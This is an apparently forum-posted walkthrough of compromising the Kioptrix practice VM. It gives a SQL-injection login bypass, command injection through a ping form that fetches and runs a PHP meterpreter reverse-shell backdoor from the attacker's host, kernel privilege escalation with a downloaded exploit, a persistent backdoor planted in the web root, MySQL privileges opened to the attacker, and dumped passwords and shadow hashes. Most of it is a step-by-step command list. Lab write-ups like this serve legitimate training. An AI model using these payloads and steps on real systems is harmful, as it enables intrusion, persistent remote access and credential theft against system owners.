After starting the network services and obtaining an IP address (192.168.0.33), the attacker does a quick nmap scan to show what host are currently "alive" on the network. After a target IP is known the attacker proceeds to do a more detailed scan on the target (192.168.0.202). By doing this, nmap shows what possible services (ports) the target has running and the version of the service and then attempts to identify the operating system (OS). The result of this shows:

* OS: Linux v2.6.x (2.6.9-30)
* Port 80 - Web Server: Apache httpd 2.0.52 (CentOS)

The attacker navigates to the web server and is presented with a login page. The attacker chooses to enter a 'standard administrator's user name'("admin") as the user name and instead of entering a valid password uses some “MySQL injection code”. This "password" will cause the original MySQL statement returning true, therefore it will login as the chosen user without the correct password being present. The vulnerable code is as follows:

* Original command
$query = "SELECT * FROM users WHERE username = '$username' AND password='$password'";

* Expected input (user: admin, Password: 5afac8d85f):
$query = "SELECT * FROM users WHERE username = 'admin' AND password='5afac8d85f'";

* "Injected" input (user: admin, Password: ' OR 1=1 -- -):
$query = "SELECT * FROM users WHERE username = 'admin' AND password='' OR 1=1 -- -'";

This works because the attacker has asked to login as "admin" and because the MySQL command is looking either for: "password" OR "1=1" to match. Because 1 will ALWAYS be 1, the statement will return true, therefore allowing the attacker to login as admin. The code at the end " -- -", comments out the rest of the query which means that the rest of the query is ignored so the attacker does not have to worry about fixing the syntax.

The attacker is then looking at the admin panel, which allows the admin to "ping" other computers attached to the network from the server location. The attacker notices that the web pages has a "php" file extension and guesses that the server supports PHP and wonders if meterpreter agent would be able to execute. The attacker creates a "php meterpreter backdoor file" and sets up a metasploit to interact with the backdoor. The attacker starts a web server which is used to host the backdoor.

The attacker now needs to transfer the backdoor onto the server allowing them to be able to gain a remote access on the system. As mentioned before the admin panel allows admins to "ping". The attacker then tries to inject in the php file to run other commands instead. The vulnerable code is as follows:

* Original command
echo shll_exec( 'ping -c 3 ' . $target );

* Expected input (ip: 192.168.0.1):
echo shll_exec( 'ping -c 3 ' . 192.168.0.1 );

* "Injected" input (ip: ; ** /*** && **** -O bd.php 192.168.0.33/backdoor.php.txt && php -f bd.php):
echo shll_exec( 'ping -c 3 ' . ; ** /*** && **** -O bd.php 192.168.0.33/backdoor.php.txt && php -f bd.php );

The coded uses “shll_exec” allows to: "Execute command via shell and return the complete output as a string". The ping command is hard-coded in at the start, however because the ping command requires an IP address to be successfully executed it fails to receive therefore it also fails to execute. Instead the attacker has used ";" which allows for commands to be executed sequentially regardless of outcome (e.g. multiple commands on the same line), which means the PHP code continues to run the attackers command even though “ping” failed. The attacker has "asked" to:

* Change directory to "/***" as this is writeable for the exploited user "apache".

* Download the content of a web page (which is the backdoor), rename it to a shorter filename and change the file extension.

* Then execute the code.

The attacker checks that a session has been created in metasploit and interacts with it. The result being that the attacker now has a remote shell on the target system.

However the exploited service (PHP) is using a user that has limited access to the system and the attacker would like more (plus the objective of kioptrix is to gain access to the superuser, "root"). The attacker makes a note of the targets system's kernel version and searches for an exploit that could lead to "privilege escalation" which would allow for “deeper access” into the system. After searching for known exploits the attacker identifies an exploit that is compatible with the target's system. The attacker downloads a copy of the exploit and transfers it using the same method as the backdoor previously. After successfully compiling the exploit, the attacker runs the exploit on the target's success which results in the attacker being promoted to the "root" account. The attacker then creates a copy of the backdoor file in the "document root". The attacker then kills the remote shell. (Note: The end goal of kioptrix has been reached and everything after copying the backdoor is optional).

As the login page requires login details, which need to be stored somewhere the attacker decides to locate these pieces of information. The attacker starts by viewing the source code of the login page for clues as these details could be; hard-coded into the source, use another file to handle this function or use a database.

Once the attacker identities that the login page uses a MySQL database which contains the login details, the attacker wants to discover what else is stored in the database. As the login page relies on the database, the login page will contain a username and password in which to access it. The attacker uses a copy the login details plus as the attacker can executed commands, they use this to their advantage by command line interaction with MySQL database.

The attacker starts off viewing all the databases which are stored in MySQL, and spots the table "MySQL" which might contain some 'interesting' details! The attacker moves on to seeing what tables are in the database, which brings up a table called "users". After selecting everything in the table the attacker spots that the "root" user has the same hash (hence same password) as the user "john" (which they are currently using).

The attacker can keep using the current system to interact with the database; however allowing direct command line access from their machine would be 'easier'. So the attacker goes about reconfiguring MySQL to allow this. Currently the only allowed access is from the local machine itself(localhost/127.0.0.1), therefore no external communication is allowed (as seen by the "nmap" & "MySQL"). However as the attacker can execute commands locally it "grants all privileges" to the user "root" on the attackers IP (which still protects access from everyone else!).

After connecting via command line, the attacker sets about finding the real password for the admin panel instead of injecting to gain access. The attacker knows which database is used (via the source code of the login page), and browses the contents of the tables. The attacker finds 2 valid logins and tries them out. The first time, shows what happens if the login details are incorrect, the next login is from a "non admin" but a valid account, and the last login is the valid admin account. When the attacker was injecting it the admin account was not specified, the database would login as the first user, in which in most cases it is the admin account as it is usually the first user that is created.

The attacker can use MySQL to view files however just like before when using PHP injection because the exploited user is a limited account, it has limited access to the system however it is a different user from before, as it now is "mysql" rather than “apache”.

The attacker tests the backdoor in order to get a remote shell again. However it is easier this time as they do not have to go though the hassle of injecting again. The attacker can just execute the php backdoor, this time done by visiting it directly on the web server, which results in the php code being executed.

After gaining access and exploiting the system gain root access, the attacker scans the system for ".mysql_history", which is a file that contains previous entered commands and views the contents when using the "root" account.

Commands *Due to the forums security, I'm unable to post the complete command list.*

start-network
dhclient eth0
clear

nmap 192.168.0.0/24 -n -sn -sP
nmap 192.168.0.202 -p 1-65500 -O -sS -sV -v

firefox http://192.168.0.202
-> User: admin
-> Password: ' OR 1=1 -- -

clear
msfpayload | grep PHP
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.0.33 LPORT=8080 R > /var/www/backdoor.php.txt
start-apache
msfconsole
use multi/handler
search php
set PAYLOAD php/meterpreter/reverse_tcp
show options
set LHOST 0.0.0.0
set LPORT 8080
show options
exploit -j -z
* kate -> /var/www/backdoor.php.txt. Remove "#". Save.
; ** /*** && **** -O bd.php 192.168.0.33/backdoor.php.txt && php -f bd.php
sessions -l -v
sessions -i 1
sysinfo
shell
uname -a; cat /etc/*-release; id; w

Firefox: Search (exploit.db): Linux Kernel 2.6 -> Download #http://www.exploit-db.com/exploits/9542/
cp 9542.c /var/www/escpriv.c
* cd /tmp
* wget 192.168.0.33/escpriv.c
* gcc escpriv.c -o rootMe
* id
* ./rootMe
* id
* whoami && cat /etc/issue

* cp bd.php /var/www/html/backdoor.php # root only on folder!
^C
y #n = interact 0 && background

firefox http://192.168.0.202
; cat index.php
-> Right click -> View Source.
--> User: john
--> Passowrd: hiroshima
--> Database: webapp
; mysql -u john -phiroshima -e "SHOW databases;"
; mysql -u john -phiroshima -e "USE mysql; SHOW tables;"
; mysql -u john -phiroshima -e "USE mysql; SELECT * FROM user;"
mysql -h 192.168.0.202 -u root
nmap 192.168.0.202 -sV -p 3306
; mysql -u root -phiroshima -e "USE mysql; GRANT ALL PRIVILEGES ON *.* TO 'root'@'192.168.0.33';" #-D mysql #IDENTIFIED BY 'g0tmi1k';"
nmap 192.168.0.202 -sV -p 3306
mysql -h 192.168.0.202 -u root
SHOW databases;
USE webapp; SHOW tables;
SELECT * FROM users;
#* firefox http://192.168.0.202/
#-->Login *fail*, john, admin
SELECT load_file('/etc/passwd');
exit

firefox http://192.168.0.202/backdoor.php
sessions -i 2
shell
*UNABLE TO POST THIS LINE OF CODE. SEE BLOG POST*
* ** /***; ./rootMe
* cat /root/.mysql_history
* cat /etc/shadow

* whoami && cat /etc/issue


#---------------------------------------------------------------------
MySQL->history: root:Ha56!blaKAbl [???]
MySQL->users: root:hiroshima [hash: 5a6914ba69e02807]
MySQL->users: john:hiroshima [hash: 5a6914ba69e02807]
MySQL->WebApp: admin:5afac8d85f [Type: Admin]
MySQL->WebApp; john:66lajGGbla [Type: Non-admin]
Shadow: root:$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.:14529:0:99999:7:::
Shadow: john:$1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1:14525:0:99999:7:::
Shadow: harold:$1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1:14529:0:99999:7:::
#---------------------------------------------------------------------


Notes

- When meterpreter is being hosted on the attacker's system, the file extension is “.txt”, therefore it does not get executed like a php file would when called from wget on the targets system.
- The “document root” folder is only writeable by “root”.
* The attacker did not have to kill the remote shell and could have been executed in it, however this method demonstrates if the backdoor failed to work or if the attacker did not wish to use one for whatever
reason)
- When connecting to MySQL remotely, a password is not required because when executing the "GRANT ALL PRIVILEGES" statement it did not include "IDENTIFIED BY 'g0tmi1k'" after the IP address. This would set the password to "g0tmi1k".

That's all! See you!